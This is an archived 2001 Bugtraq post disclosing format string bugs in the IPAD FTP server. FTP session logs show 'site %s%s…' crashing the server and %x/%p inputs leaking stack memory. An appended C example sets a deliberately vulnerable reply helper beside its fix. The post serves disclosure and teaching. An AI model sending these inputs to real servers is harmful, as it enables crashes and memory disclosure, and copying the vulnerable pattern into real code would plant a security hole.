Bugtraq mailing list archives

Multi format string bugs in IPAD x.x ftp server


From: diab <diab_qaip () HOTMAIL COM>
Date: Sat, 17 Feb 2001 15:03:35 -0000

Hi ppl,
There appear to be multiple format string bugs
in IPAD x.x ftp server. Here are some
examples with the 'site' command:

[diab@epuj diab]$ ftp xxx.xxx.xxx.xxx
Connected to xxx.xxx.xxx.xxx.
220 xxx.xxx.xxx.xxx FTP server (IPAD 2.52) ready
at Wed Feb 14 16:08:08 2001
Name (xxx.xxx.xxx.xxx:diab): anonymous
331 Anonymous logins ok. Please enter your e-mail
address as password.
Password:
230 User anonymous logged in.
Remote system type is MSDOS.
ftp> site %s%s%s%s%s%s%s%s%s%s%s%s%s%s
Segmentation fault
[diab@epuj diab]$

or:
ftp> site %x%x%x%x%x%x%x%x%x%x%x
500 Unknown command 'site
8057478806014080635400bfffcc78455449532578252025782578257825782578257825782578'

or:
ftp> site %p%p
500 Unknown command
'8067efc680000184013dab8684013db98'

or:
ftp> site %c%c%c%c
500 Unknown command
'2570(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)(nil)0x4
etc 
ftp> quit
500 Unknown command 'site
0.0000000.00000098099176241206326244409344.000000'
[diab@epuj diab]$
   
Anyway I thought I might bring this issue to some
people's attention.
bye,
- diab
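
The bug class reported above, as an added example that is not part of the original post and is not IPAD's code: a hypothetical `reply()` helper builds the FTP status line, with the vulnerable caller beside the corrected one. All function names are assumptions, and the inputs are constructed.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

static char line[256];  /* demo output buffer */

/* Hypothetical status-line helper: writes "<code> <formatted text>". */
static char *reply(char *out, size_t outsz, int code, const char *fmt, ...)
{
    va_list ap;
    int n = snprintf(out, outsz, "%d ", code);
    if (n < 0 || (size_t)n >= outsz)
        return out;
    va_start(ap, fmt);
    vsnprintf(out + n, outsz - (size_t)n, fmt, ap);
    va_end(ap);
    return out;
}

/* BUG: the client's command text becomes part of the format string, so
 * each '%' directive in it is interpreted and reads arguments that were
 * never passed (stack values leak; %s can dereference a bad pointer). */
static char *unknown_cmd_vulnerable(char *out, size_t outsz, const char *cmd)
{
    char fmt[512];
    snprintf(fmt, sizeof fmt, "Unknown command '%s'", cmd);
    return reply(out, outsz, 500, fmt);
}

/* FIX: the format string is a constant; client text is only ever data. */
static char *unknown_cmd_fixed(char *out, size_t outsz, const char *cmd)
{
    return reply(out, outsz, 500, "Unknown command '%s'", cmd);
}

int main(void)
{
    /* Constructed input. "%%" consumes no argument, so it shows the
     * interpretation without triggering undefined behaviour. */
    puts(unknown_cmd_vulnerable(line, sizeof line, "site 100%%"));
    puts(unknown_cmd_fixed(line, sizeof line, "site 100%%"));
    puts(unknown_cmd_fixed(line, sizeof line, "site %x%x%s%s"));
    return 0;
}
```

Marking `reply()` with GCC/Clang's `__attribute__((format(printf, 4, 5)))` and building with `-Wformat -Wformat-security` makes the compiler flag the vulnerable call.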